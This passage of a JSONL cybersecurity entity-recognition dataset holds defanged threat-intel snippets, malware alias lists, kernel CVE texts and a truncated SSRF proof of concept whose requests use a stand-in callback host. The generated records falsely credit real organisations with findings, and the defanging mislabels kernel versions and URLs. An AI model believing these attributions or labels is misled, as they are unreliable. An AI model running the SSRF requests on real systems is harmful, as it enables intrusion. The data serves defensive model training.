Check the memory size with to check if it is less than 2 GB .", "spans": {"Indicator: http://linda-callaghan.icu/Minkowski/brown": [[449, 495]]}, "info": {"id": "cyberner_stix_train_005465", "source": "defanged_augment"}} {"text": "Here is a list of broadcast actions : android.provider.Telephony.SMS_RECEIVED android.net.conn.CONNECTIVITY_CHANGE android.intent.action.BATTERY_CHANGED android.intent.action.USER_PRESENT android.intent.action.PHONE_STATE android.net.wifi.SCAN_RESULTS android.intent.action.PACKAGE_ADDED android.intent.action.PACKAGE_REMOVED android.intent.action.SCREEN_OFF android.intent.action.SCREEN_ON Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones . Another time , the execution flow moves from “ exit[.]exe to “ i[.]cmd ” .", "spans": {"Malware: wuaupdt.exe": [[448, 459]], "Indicator: exit.exe": [[602, 612]], "Indicator: i.cmd": [[618, 625]]}, "info": {"id": "cyberner_stix_train_002072", "source": "defanged_augment"}} {"text": "Mozilla ( Windows NT 6.1 ; WOW64 ) WinHttp/1 [ . ] 6 [ . ] 3 [ . ] 8 ( WinHTTP/5.1 ) like Gecko .", "spans": {"Organization: Mozilla": [[0, 7]], "System: Windows": [[10, 17]], "Indicator: 1.6.3.8": [[43, 68]]}, "info": {"id": "cyberner_stix_train_002543", "source": "defanged_augment"}} {"text": "Blog Post by Microsoft MSRC: Tracking Turla's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-12082 against Barracuda ESG deployments. The initial access vector involves spear-phishing emails from finance@secure-verify[ . ]net delivering RemcosRAT. Post-compromise, the attackers deploy SystemBC and use Chisel for reconnaissance. C2 infrastructure includes 172 [ . ] 137 [ . ] 9 [ . ] 157 and edgerelay[.]live. A staging server at hxxps://edge-proxy[.]dev/panel/index.html hosts additional tooling. 
Key artifact: C:\\Users\\admin\\AppData\\Local\\Temp\\update.dll (SHA256: e4ab9121a66e99979e9de02f743313edf9e3d938561aa8f803b4afe58fc0db4a).", "spans": {"Organization: Microsoft MSRC": [[13, 27]], "Vulnerability: CVE-2020-12082": [[123, 137]], "System: Barracuda ESG": [[146, 159]], "Indicator: finance@secure-verify.net": [[235, 264]], "Malware: RemcosRAT": [[276, 285]], "Malware: SystemBC": [[325, 333]], "Indicator: 172.137.9.157": [[396, 427]], "Indicator: edgerelay.live": [[432, 448]], "Indicator: hxxps://edge-proxy.dev/panel/index.html": [[470, 511]], "Indicator: e4ab9121a66e99979e9de02f743313edf9e3d938561aa8f803b4afe58fc0db4a": [[606, 670]]}, "info": {"id": "synth_v2_01646", "source": "defanged_augment"}} {"text": "When presented with TG-4127 's spoofed login page , victims might be convinced it was the legitimate login page for their hillaryclinton[.]com email account .", "spans": {"Indicator: hillaryclinton.com": [[122, 142]]}, "info": {"id": "cyberner_stix_train_005351", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Typic!O Downldr.TonickCS.S543700 Dropper.Typic.Win32.736 Trojan/Dropper.Typic.arx Win32.Trojan-Downloader.VB.p Win32/Fruspam.GF Win.Trojan.Typic-1 Trojan-Downloader.Win32.Dapato.stb Trojan.Win32.Typic.dvexc TrojWare.Win32.TrojanDownloader.VB.OSNA TrojanDropper[.]Typic[.]me Trojan[Dropper]/Win32.Typic Dropper/Win32.Typic.R2031 TrojanDownloader.VB Trojan.Downloader.WCA Win32/TrojanDownloader.VB.OSN Trojan.DR.Typic!OCnhzJxHb3A Backdoor.Win32.Bifrose Trj/Downloader.XOR", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: TrojanDropper.Typic.me": [[294, 320]]}, "info": {"id": "cyner2_train_005741", "source": "defanged_augment"}} {"text": "Blog Post by INTERPOL: Tracking Gamaredon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2022-29213 against VMware ESXi deployments. 
The initial access vector involves spear-phishing emails from account@mail-service[.]info delivering SystemBC. Post-compromise, the attackers deploy SmokeLoader and use PsExec for reconnaissance. C2 infrastructure includes 140 [ . ] 81 [ . ] 230 [ . ] 58 and mail-static[ . ]online. A staging server at hxxps://gatewaylogin[ . ]com/login hosts additional tooling. Key artifact: C:\\Users\\admin\\Desktop\\backdoor.elf (MD5: aa702e8872edff1b78f3331d13251604).", "spans": {"Organization: INTERPOL": [[13, 21]], "Vulnerability: CVE-2022-29213": [[121, 135]], "System: VMware ESXi": [[144, 155]], "Indicator: account@mail-service.info": [[231, 258]], "Malware: SystemBC": [[270, 278]], "Malware: SmokeLoader": [[318, 329]], "Indicator: 140.81.230.58": [[392, 423]], "Indicator: mail-static.online": [[428, 450]], "Indicator: https://gatewaylogin.com/login": [[472, 506]], "Indicator: aa702e8872edff1b78f3331d13251604": [[589, 621]]}, "info": {"id": "synth_v2_01664", "source": "defanged_augment"}} {"text": "The message translates roughly to “ You got a photo in MMS format : hxxp : //yyyyyyyy[ . ]XXXX[ . ]ru/mms.apk. ” So far we identified seven different URLs being used to spread RuMMS in the wild . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information . The fact that the “ 28847[ . ]exe ” file can be opened makes us understand that the “ 28847 ” file is another SFX file . 
LotLBin techniques also make it difficult for defenders to detect threat activity as they need to not only remain vigilant for new files introduced to their environments , but also for modifications to files already present within their installed OT applications and services .", "spans": {"Malware: RuMMS": [[176, 181]], "Organization: oil": [[390, 393]], "Organization: gas": [[396, 399]], "Organization: petrochemical companies": [[406, 429]], "Organization: executives": [[459, 469]], "Indicator: 28847.exe": [[607, 620]], "Indicator: 28847": [[672, 677]], "System: OT applications": [[952, 967]], "Indicator: yyyyyyyy.XXXX.ru": [[77, 101]]}, "info": {"id": "cyberner_stix_train_005420", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Seatbelt artifacts at C:\\Program Files\\Common Files\\update.dll. Memory dump analysis confirmed execution of WinPEAS. Registry modifications pointed to persistence via C:\\Windows\\Temp\\update.dll. Network forensics identified connections to 179 [ . ] 181 [ . ] 247 [ . ] 59 and portal-portal[.]club. Email headers traced the initial vector to noreply@account-update[ . ]xyz. File /home/user/.config/svchost.exe (SHA1: ea1770a8c791419e9d4ba854f93baa64f7efa0a5) was identified as the initial dropper. A staging URL hxxps://syncstatic[ . ]org/wp-content/uploads/doc.php resolved to 107 [ . ] 65 [ . ] 147 [ . ] 226. 
Secondary artifact hash: SHA256: 2ce7e92bf743efdf5b75af69d3c02dc00c72d155ca0e3776240d734335db3389.", "spans": {"Indicator: 179.181.247.59": [[311, 343]], "Indicator: portal-portal.club": [[348, 368]], "Indicator: noreply@account-update.xyz": [[413, 443]], "Indicator: ea1770a8c791419e9d4ba854f93baa64f7efa0a5": [[488, 528]], "Indicator: hxxps://syncstatic.org/wp-content/uploads/doc.php": [[583, 636]], "Indicator: 107.65.147.226": [[649, 681]], "Indicator: 2ce7e92bf743efdf5b75af69d3c02dc00c72d155ca0e3776240d734335db3389": [[716, 780]]}, "info": {"id": "synth_v2_01208", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: ses: Handle enclosure with just a primary component gracefully\n\nThis reverts commit 3fe97ff3d949 (\"scsi: ses: Don't attach if enclosure\nhas no components\") and introduces proper handling of case where there are\nno detected secondary components, but primary component (enumerated in\nnum_enclosures) does exist. 
That fix was originally proposed by Ding Hui\n.\n\nCompletely ignoring devices that have one primary enclosure and no\nsecondary one results in ses_intf_add() bailing completely\n\n\tscsi 2:0:0:254: enclosure has no enumerated components\n scsi 2:0:0:254: Failed to bind enclosure -12ven in valid configurations such\n\neven on valid configurations with 1 primary and 0 secondary enclosures as\nbelow:\n\n\t# sg_ses /dev/sg0\n\t 3PARdata SES 3321\n\tSupported diagnostic pages:\n\t Supported Diagnostic Pages [sdp] [0x0]\n\t Configuration (SES) [cf] [0x1]\n\t Short Enclosure Status (SES) [ses] [0x8]\n\t# sg_ses -p cf /dev/sg0\n\t 3PARdata SES 3321\n\tConfiguration diagnostic page:\n\t number of secondary subenclosures: 0\n\t generation code: 0x0\n\t enclosure descriptor list\n\t Subenclosure identifier: 0 [primary]\n\t relative ES process id: 0, number of ES processes: 1\n\t number of type descriptor headers: 1\n\t enclosure logical identifier (hex): 20000002ac02068d\n\t enclosure vendor: 3PARdata product: VV rev: 3321\n\t type descriptor header and text list\n\t Element type: Unspecified, subenclosure id: 0\n\t number of possible elements: 1\n\nThe changelog for the original fix follows\n\n=====\nWe can get a crash when disconnecting the iSCSI session,\nthe call trace like this:\n\n [ffff00002a00fb70] kfree at ffff00000830e224\n [ffff00002a00fba0] ses_intf_remove at ffff000001f200e4\n [ffff00002a00fbd0] device_del at ffff0000086b6a98\n [ffff00002a00fc50] device_unregister at ffff0000086b6d58\n [ffff00002a00fc70] __scsi_remove_device at ffff00000870608c\n [ffff00002a00fca0] scsi_remove_device at ffff000008706134\n [ffff00002a00fcc0] __scsi_remove_target at ffff0000087062e4\n [ffff00002a00fd10] scsi_remove_target at ffff0000087064c0\n [ffff00002a00fd70] __iscsi_unbind_session at ffff000001c872c4\n [ffff00002a00fdb0] process_one_work at ffff00000810f35c\n [ffff00002a00fe00] worker_thread at ffff00000810f648\n [ffff00002a00fe70] kthread at ffff000008116e98\n\nIn 
ses_intf_add, components count could be 0, and kcalloc 0 size scomp,\nbut not saved in edev->component[i].scratch\n\nIn this situation, edev->component[0].scratch is an invalid pointer,\nwhen kfree it in ses_intf_remove_enclosure, a crash like above would happen\nThe call trace also could be other random cases when kfree cannot catch\nthe invalid pointer\n\nWe should not use edev->component[] array when the components count is 0\nWe also need check index when use edev->component[] array in\nses_enclosure_data_process\n=====", "spans": {"Indicator: sangfor.com": [[439, 452]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-53431"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed PowerView artifacts at C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py. Memory dump analysis confirmed execution of Merlin. Registry modifications pointed to persistence via C:\\Users\\Public\\Documents\\taskhost.exe. Network forensics identified connections to 172[.]215[.]146[.]103 and backup-sync[ . ]io. Email headers traced the initial vector to hr@identity-verify[.]cc. File C:\\Program Files\\Common Files\\beacon.dll (SHA1: d4cfddc3707f93cd9943b40bef9a7904d87bdd54) was identified as the initial dropper. A staging URL hxxp://datacloud[.]org/collect resolved to 60[.]200[.]175[.]98. 
Secondary artifact hash: SHA1: 2e074bd8e65aa52f3c7e4590c7e0c7eb865cab7b.", "spans": {"Indicator: 172.215.146.103": [[325, 346]], "Indicator: backup-sync.io": [[351, 369]], "Indicator: hr@identity-verify.cc": [[414, 437]], "Indicator: d4cfddc3707f93cd9943b40bef9a7904d87bdd54": [[492, 532]], "Indicator: hxxp://datacloud.org/collect": [[587, 617]], "Indicator: 60.200.175.98": [[630, 649]], "Indicator: 2e074bd8e65aa52f3c7e4590c7e0c7eb865cab7b": [[682, 722]]}, "info": {"id": "synth_v2_01290", "source": "defanged_augment"}} {"text": "A backdoor also known as: Win32.LovGate.W@mm W32.LovGate.W Win32.LovGate.W@mm Spyware.PasswordStealer W32/Lovgate.W@M Win32.LovGate.E8C19A WORM_LOVGATE.BJ Win32.Trojan.WisdomEyes.16070401.9500.9982 W32/Lovgate.W@mm W32.HLLW.Lovgate.I@mm Win32/Lovgate.AX WORM_LOVGATE.BJ Win.Worm.Lovgate-35 Win32.LovGate.W@mm Trojan.Win32.MultiPacked.dgpeeo Win32.Worm-email.Lovgate.Dwsv Win32.HLLM.Lovgate.based Worm.LovGate.Win32.79 BehavesLike[.]Win32[.]PWSZbot[.]cc W32/Lovgate.W@mm I-Worm/Supkp.a WORM/Lovgate.BK Worm[Email]/Win32.LovGate Worm:Win32/Lovgate.W@mm W32.W.LovGate.kYPD Win32.LovGate.W@mm Win32/LovGate.worm.179200 W32/Lovgate.w@M Worm.Lovgate I-Worm.Lovgate.AP Win32/Lovgate.AP I-Worm.Lovgate.BI Worm.Win32.Lovgate Win32.LovGate.W@mm", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.PWSZbot.cc": [[418, 452]]}, "info": {"id": "cyner2_train_002803", "source": "defanged_augment"}} {"text": "Initiating the MQTT client . APT33 has targeted organizations – spanning multiple industries – headquartered in the United States , Saudi Arabia and South Korea . The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS ) bitsadmin[ . ]exe to receive commands and exfiltrate . 
Germany retained its place as the fourth most attacked country in the world , and the most attacked country outside of the anglosphere .", "spans": {"Organization: spanning multiple industries": [[64, 92]], "Organization: Microsoft": [[193, 202]], "System: Windows": [[278, 285]], "Indicator: bitsadmin.exe": [[359, 376]]}, "info": {"id": "cyberner_stix_train_005999", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Dos.Bonk.C DoS.Win32.Bonk!O Dos.Bonk Win32.Trojan.Bonk.Tcwa W32/Tool.FPXO-2436 DoS.Win32.Bonk.c Trojan.Dos.Bonk.C Trojan.Win32.Bonk.ddda TrojWare.Win32.DoS.Bonk.C Trojan.Dos.Bonk.C Trojan.Inject.654 BehavesLike.Win32.ExploitMydoom.mm Backdoor.Win32.HacDef W32/VirTool[.]RO TR/RedCap.kudtu DoS:Win32/Bonk.C Trojan.Dos.Bonk.C DoS.Win32.Bonk.c Trojan.Dos.Bonk.C Trojan.Asthma.23305 Trojan.Dos.Bonk.C Trojan.Dos.Bonk.C Win32/DoS.Bonk.C DoS.Bonk!CFlP7tiJI8A DoS/Bonk.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: VirTool.RO": [[293, 305]]}, "info": {"id": "cyner2_train_007680", "source": "defanged_augment"}} {"text": "Malware Analysis Report: RedLine Stealer (SHA256: 3f40ba9425e052fa584e61e52a675e31fc129fcc97e7045d280c74e59e48fa39). Upon execution on Atlassian Confluence, the sample creates C:\\ProgramData\\chrome_helper.exe and injects into legitimate processes. Network analysis shows beaconing to 5[.]57[.]97[.]149 every 60 seconds and DNS queries to nodeedge[ . ]info. The second stage was fetched from hxxps://portal-static[ . ]club/wp-content/uploads/doc.php and written to C:\\Users\\admin\\Desktop\\backdoor.elf. The payload uses CrackMapExec-style techniques for defense evasion. 
A secondary hash (SHA256: ccbaad49c780271950c3fd3a226c39f39b7ee834befa66f167e4e9c4dd971f52) was extracted from the unpacked payload.", "spans": {"Malware: RedLine Stealer": [[25, 40]], "Indicator: 3f40ba9425e052fa584e61e52a675e31fc129fcc97e7045d280c74e59e48fa39": [[50, 114]], "System: Atlassian Confluence": [[135, 155]], "Indicator: 5.57.97.149": [[284, 301]], "Indicator: nodeedge.info": [[338, 355]], "Indicator: hxxps://portal-static.club/wp-content/uploads/doc.php": [[391, 448]], "Indicator: ccbaad49c780271950c3fd3a226c39f39b7ee834befa66f167e4e9c4dd971f52": [[595, 659]]}, "info": {"id": "synth_v2_00513", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 192[.]127[.]29[.]20, the Kaspersky GReAT IR team identified WarmCookie running as C:\\Users\\admin\\Desktop\\beacon.dll. The threat actor, believed to be OilRig, used BloodHound for credential harvesting and GhostPack for lateral movement. Exfiltrated data was sent to storage-mail[ . ]cc and backup-login[ . ]cc. The initial dropper (SHA256: ef8433053b43f225c848eb78a7ff6b4d51a913eac8c2be1d8926f124e35e075a) was delivered via a phishing email from confirm@login-portal[.]tech. A second C2 node was observed at 10[.]224[.]92[.]73, with a persistence mechanism writing to C:\\Users\\Public\\Documents\\chrome_helper.exe.", "spans": {"Indicator: 192.127.29.20": [[64, 83]], "Organization: Kaspersky GReAT": [[89, 104]], "Malware: WarmCookie": [[124, 134]], "Indicator: storage-mail.cc": [[329, 348]], "Indicator: backup-login.cc": [[353, 372]], "Indicator: ef8433053b43f225c848eb78a7ff6b4d51a913eac8c2be1d8926f124e35e075a": [[403, 467]], "Indicator: confirm@login-portal.tech": [[509, 536]], "Indicator: 10.224.92.73": [[571, 589]]}, "info": {"id": "synth_v2_00415", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2024-35928 is a critical integer overflow affecting Juniper SRX. Google TAG confirmed active exploitation by Lazarus Group in the wild. 
Exploitation delivers AgentTesla (SHA1: c583be68a3bc16a1e28b06ec4d22afdcf6155c63) which is dropped to C:\\Users\\admin\\Downloads\\helper.sh. The exploit payload is hosted at hxxp://static-login[.]com/api/v2/auth and communicates to 172 [ . ] 236 [ . ] 237 [ . ] 228 for C2.", "spans": {"Vulnerability: CVE-2024-35928": [[24, 38]], "Vulnerability: integer overflow": [[53, 69]], "System: Juniper SRX": [[80, 91]], "Organization: Google TAG": [[93, 103]], "Malware: AgentTesla": [[186, 196]], "Indicator: c583be68a3bc16a1e28b06ec4d22afdcf6155c63": [[204, 244]], "Indicator: http://static-login.com/api/v2/auth": [[335, 372]], "Indicator: 172.236.237.228": [[393, 426]]}, "info": {"id": "synth_v2_00804", "source": "defanged_augment"}} {"text": "Artifact Analysis for Gootloader campaign:\nStage 1 dropper at C:\\Users\\admin\\Downloads\\csrss.exe - MD5: 6b8d6e70f6a2283fc7bcb17bfca371d8\nStage 2 loader at C:\\Users\\admin\\Downloads\\payload.bin - SHA1: 9881716b7d79f524c60379231d01b0a4ed5512f5\nFinal payload at C:\\Users\\admin\\Downloads\\winlogon.exe - MD5: 689a8649ed097c1fb10f6f1fbab07817\nExfiltration module - SHA1: 2ebec8343f49a76a00e10bdc7efbe4275a02009e\nAll stages communicated with 87 [ . ] 142 [ . ] 253 [ . ] 97. Havoc signatures detected in Stage 2.", "spans": {"Malware: Gootloader": [[22, 32]], "Indicator: 6b8d6e70f6a2283fc7bcb17bfca371d8": [[104, 136]], "Indicator: 9881716b7d79f524c60379231d01b0a4ed5512f5": [[200, 240]], "Indicator: 689a8649ed097c1fb10f6f1fbab07817": [[303, 335]], "Indicator: 2ebec8343f49a76a00e10bdc7efbe4275a02009e": [[364, 404]], "Indicator: 87.142.253.97": [[434, 465]]}, "info": {"id": "synth_v2_01946", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPI: CPPC: Use access_width over bit_width for system memory accesses\n\nTo align with ACPI 6.3+, since bit_width can be any 8-bit value, it\ncannot be depended on to be always on a clean 8b boundary. 
This was\nuncovered on the Cobalt 100 platform.\n\nSError Interrupt on CPU26, code 0xbe000011 -- SError\n CPU: 26 PID: 1510 Comm: systemd-udevd Not tainted 5[.]15[.]2[.]1-13 #1\n Hardware name: MICROSOFT CORPORATION, BIOS MICROSOFT CORPORATION\n pstate: 62400009 (nZCv daif +PAN -UAO +TCO -DIT -SSBS BTYPE=--)\n pc : cppc_get_perf_caps+0xec/0x410\n lr : cppc_get_perf_caps+0xe8/0x410\n sp : ffff8000155ab730\n x29: ffff8000155ab730 x28: ffff0080139d0038 x27: ffff0080139d0078\n x26: 0000000000000000 x25: ffff0080139d0058 x24: 00000000ffffffff\n x23: ffff0080139d0298 x22: ffff0080139d0278 x21: 0000000000000000\n x20: ffff00802b251910 x19: ffff0080139d0000 x18: ffffffffffffffff\n x17: 0000000000000000 x16: ffffdc7e111bad04 x15: ffff00802b251008\n x14: ffffffffffffffff x13: ffff013f1fd63300 x12: 0000000000000006\n x11: ffffdc7e128f4420 x10: 0000000000000000 x9 : ffffdc7e111badec\n x8 : ffff00802b251980 x7 : 0000000000000000 x6 : ffff0080139d0028\n x5 : 0000000000000000 x4 : ffff0080139d0018 x3 : 00000000ffffffff\n x2 : 0000000000000008 x1 : ffff8000155ab7a0 x0 : 0000000000000000\n Kernel panic - not syncing: Asynchronous SError Interrupt\n CPU: 26 PID: 1510 Comm: systemd-udevd Not tainted\n5 [ . ] 15 [ . ] 2 [ . 
] 1-13 #1\n Hardware name: MICROSOFT CORPORATION, BIOS MICROSOFT CORPORATION\n Call trace:\n dump_backtrace+0x0/0x1e0\n show_stack+0x24/0x30\n dump_stack_lvl+0x8c/0xb8\n dump_stack+0x18/0x34\n panic+0x16c/0x384\n add_taint+0x0/0xc0\n arm64_serror_panic+0x7c/0x90\n arm64_is_fatal_ras_serror+0x34/0xa4\n do_serror+0x50/0x6c\n el1h_64_error_handler+0x40/0x74\n el1h_64_error+0x7c/0x80\n cppc_get_perf_caps+0xec/0x410\n cppc_cpufreq_cpu_init+0x74/0x400 [cppc_cpufreq]\n cpufreq_online+0x2dc/0xa30\n cpufreq_add_dev+0xc0/0xd4\n subsys_interface_register+0x134/0x14c\n cpufreq_register_driver+0x1b0/0x354\n cppc_cpufreq_init+0x1a8/0x1000 [cppc_cpufreq]\n do_one_initcall+0x50/0x250\n do_init_module+0x60/0x27c\n load_module+0x2300/0x2570\n __do_sys_finit_module+0xa8/0x114\n __arm64_sys_finit_module+0x2c/0x3c\n invoke_syscall+0x78/0x100\n el0_svc_common.constprop.0+0x180/0x1a0\n do_el0_svc+0x84/0xa0\n el0_svc+0x2c/0xc0\n el0t_64_sync_handler+0xa4/0x12c\n el0t_64_sync+0x1a4/0x1a8\n\nInstead, use access_width to determine the size and use the offset and\nwidth to shift and mask the bits to read/write out. 
Make sure to add a\ncheck for system memory since pcc redefines the access_width to\nsubspace id.\n\nIf access_width is not set, then fall back to using bit_width.\n\n[ rjw: Subject and changelog edits, comment adjustments ]", "spans": {"Indicator: 5.15.2.1": [[420, 434], [1447, 1473]], "System: Linux kernel": [[7, 19]], "System: systemd": [[394, 401], [1421, 1428]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-35995"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: map the EBADMSG to nfserr_io to avoid warning\n\nExt4 will throw -EBADMSG through ext4_readdir when a checksum error\noccurs, resulting in the following WARNING.\n\nFix it by mapping EBADMSG to nfserr_io.\n\nnfsd_buffered_readdir\n iterate_dir // -EBADMSG -74\n ext4_readdir // .iterate_shared\n ext4_dx_readdir\n ext4_htree_fill_tree\n htree_dirblock_to_tree\n ext4_read_dirblock\n __ext4_read_dirblock\n ext4_dirblock_csum_verify\n warn_no_space_for_csum\n __warn_no_space_for_csum\n return ERR_PTR(-EFSBADCRC) // -EBADMSG -74\n nfserrno // WARNING\n\n[ 161.115610] ------------[ cut here ]------------\n[ 161.116465] nfsd: non-standard errno: -74\n[ 161.117315] WARNING: CPU: 1 PID: 780 at fs/nfsd/nfsproc.c:878 nfserrno+0x9d/0xd0\n[ 161.118596] Modules linked in:\n[ 161.119243] CPU: 1 PID: 780 Comm: nfsd Not tainted 5.10.0-00014-g79679361fd5d #138\n[ 161.120684] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qe\nmu[ . 
]org 04/01/2014\n[ 161.123601] RIP: 0010:nfserrno+0x9d/0xd0\n[ 161.124676] Code: 0f 87 da 30 dd 00 83 e3 01 b8 00 00 00 05 75 d7 44 89 ee 48 c7 c7 c0 57 24 98 89 44 24 04 c6\n 05 ce 2b 61 03 01 e8 99 20 d8 00 <0f> 0b 8b 44 24 04 eb b5 4c 89 e6 48 c7 c7 a0 6d a4 99 e8 cc 15 33\n[ 161.127797] RSP: 0018:ffffc90000e2f9c0 EFLAGS: 00010286\n[ 161.128794] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000\n[ 161.130089] RDX: 1ffff1103ee16f6d RSI: 0000000000000008 RDI: fffff520001c5f2a\n[ 161.131379] RBP: 0000000000000022 R08: 0000000000000001 R09: ffff8881f70c1827\n[ 161.132664] R10: ffffed103ee18304 R11: 0000000000000001 R12: 0000000000000021\n[ 161.133949] R13: 00000000ffffffb6 R14: ffff8881317c0000 R15: ffffc90000e2fbd8\n[ 161.135244] FS: 0000000000000000(0000) GS:ffff8881f7080000(0000) knlGS:0000000000000000\n[ 161.136695] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 161.137761] CR2: 00007fcaad70b348 CR3: 0000000144256006 CR4: 0000000000770ee0\n[ 161.139041] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 161.140291] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 161.141519] PKRU: 55555554\n[ 161.142076] Call Trace:\n[ 161.142575] ? __warn+0x9b/0x140\n[ 161.143229] ? nfserrno+0x9d/0xd0\n[ 161.143872] ? report_bug+0x125/0x150\n[ 161.144595] ? handle_bug+0x41/0x90\n[ 161.145284] ? exc_invalid_op+0x14/0x70\n[ 161.146009] ? asm_exc_invalid_op+0x12/0x20\n[ 161.146816] ? nfserrno+0x9d/0xd0\n[ 161.147487] nfsd_buffered_readdir+0x28b/0x2b0\n[ 161.148333] ? nfsd4_encode_dirent_fattr+0x380/0x380\n[ 161.149258] ? nfsd_buffered_filldir+0xf0/0xf0\n[ 161.150093] ? wait_for_concurrent_writes+0x170/0x170\n[ 161.151004] ? generic_file_llseek_size+0x48/0x160\n[ 161.151895] nfsd_readdir+0x132/0x190\n[ 161.152606] ? nfsd4_encode_dirent_fattr+0x380/0x380\n[ 161.153516] ? nfsd_unlink+0x380/0x380\n[ 161.154256] ? override_creds+0x45/0x60\n[ 161.155006] nfsd4_encode_readdir+0x21a/0x3d0\n[ 161.155850] ? 
nfsd4_encode_readlink+0x210/0x210\n[ 161.156731] ? write_bytes_to_xdr_buf+0x97/0xe0\n[ 161.157598] ? __write_bytes_to_xdr_buf+0xd0/0xd0\n[ 161.158494] ? lock_downgrade+0x90/0x90\n[ 161.159232] ? nfs4svc_decode_voidarg+0x10/0x10\n[ 161.160092] nfsd4_encode_operation+0x15a/0x440\n[ 161.160959] nfsd4_proc_compound+0x718/0xe90\n[ 161.161818] nfsd_dispatch+0x18e/0x2c0\n[ 161.162586] svc_process_common+0x786/0xc50\n[ 161.163403] ? nfsd_svc+0x380/0x380\n[ 161.164137] ? svc_printk+0x160/0x160\n[ 161.164846] ? svc_xprt_do_enqueue.part.0+0x365/0x380\n[ 161.165808] ? nfsd_svc+0x380/0x380\n[ 161.166523] ? rcu_is_watching+0x23/0x40\n[ 161.167309] svc_process+0x1a5/0x200\n[ 161.168019] nfsd+0x1f5/0x380\n[ 161.168663] ? nfsd_shutdown_threads+0x260/0x260\n[ 161.169554] kthread+0x1c4/0x210\n[ 161.170224] ? kthread_insert_work_sanity_check+0x80/0x80\n[ 161.171246] ret_from_fork+0x1f/0x30", "spans": {"Indicator: mu.org": [[1075, 1085]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[991, 995]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-49875"}} {"text": "IOC Bulletin - BumbleBee Campaign:\nNetwork Indicators:\n- 193 [ . ] 118 [ . ] 16 [ . ] 142\n- 27[.]107[.]54[.]148\n- 148[.]193[.]254[.]18\n- login-auth[ . ]xyz\n- mail-backup[ . ]org\nURLs:\n- hxxps://securemail[ . 
]top/api/v2/auth\n- hxxps://cache-cdn[.]xyz/collect\nEmail Senders:\n- finance@phishing-domain[.]com\n- notification@mail-service[.]info\nFile Indicators:\n- SHA1: 783cc21132fb7b32668322156eb608431693f540\n- SHA1: f3d579b1abaca1884c1d0d7f5253ed18094bdc6e\n- Drop path: C:\\Users\\admin\\Downloads\\shell.php", "spans": {"Malware: BumbleBee": [[15, 24]], "Indicator: 193.118.16.142": [[57, 89]], "Indicator: 27.107.54.148": [[92, 111]], "Indicator: 148.193.254.18": [[114, 134]], "Indicator: login-auth.xyz": [[137, 155]], "Indicator: mail-backup.org": [[158, 177]], "Indicator: hxxps://securemail.top/api/v2/auth": [[186, 224]], "Indicator: https://cache-cdn.xyz/collect": [[227, 258]], "Indicator: finance@phishing-domain.com": [[276, 305]], "Indicator: notification@mail-service.info": [[308, 340]], "Indicator: 783cc21132fb7b32668322156eb608431693f540": [[366, 406]], "Indicator: f3d579b1abaca1884c1d0d7f5253ed18094bdc6e": [[415, 455]]}, "info": {"id": "synth_v2_01474", "source": "defanged_augment"}} {"text": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. 
This is exclusively with POST requests.\n\nPOC\n\nStep 1: Prepare the SSRF with a request like this:\n\nGET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://\nHTTP/1.1\n\nHost: \nAccept-Encoding: gzip, deflate\n\nAccept: */*\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \nContent-Type: application/json\n\nContent-Length: 0\n\nStep 2: Trigger this alert with this request\n\nGET /qstorapi/alertRaise?title=test&message=test&severity=1 \nHTTP/1.1\n\nHost: \nAccept-Encoding: gzip, deflate\n\nAccept: */*\n\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \nContent-Type: application/json\n\nContent-Length: 1\n\nThe post request received by looks like this:\n{\n \n### Python FLASK stuff ####\n\n 'endpoint': 'index', \n \n'method': 'POST', \n \n'cookies': ImmutableMultiDict([]), \n \n### END 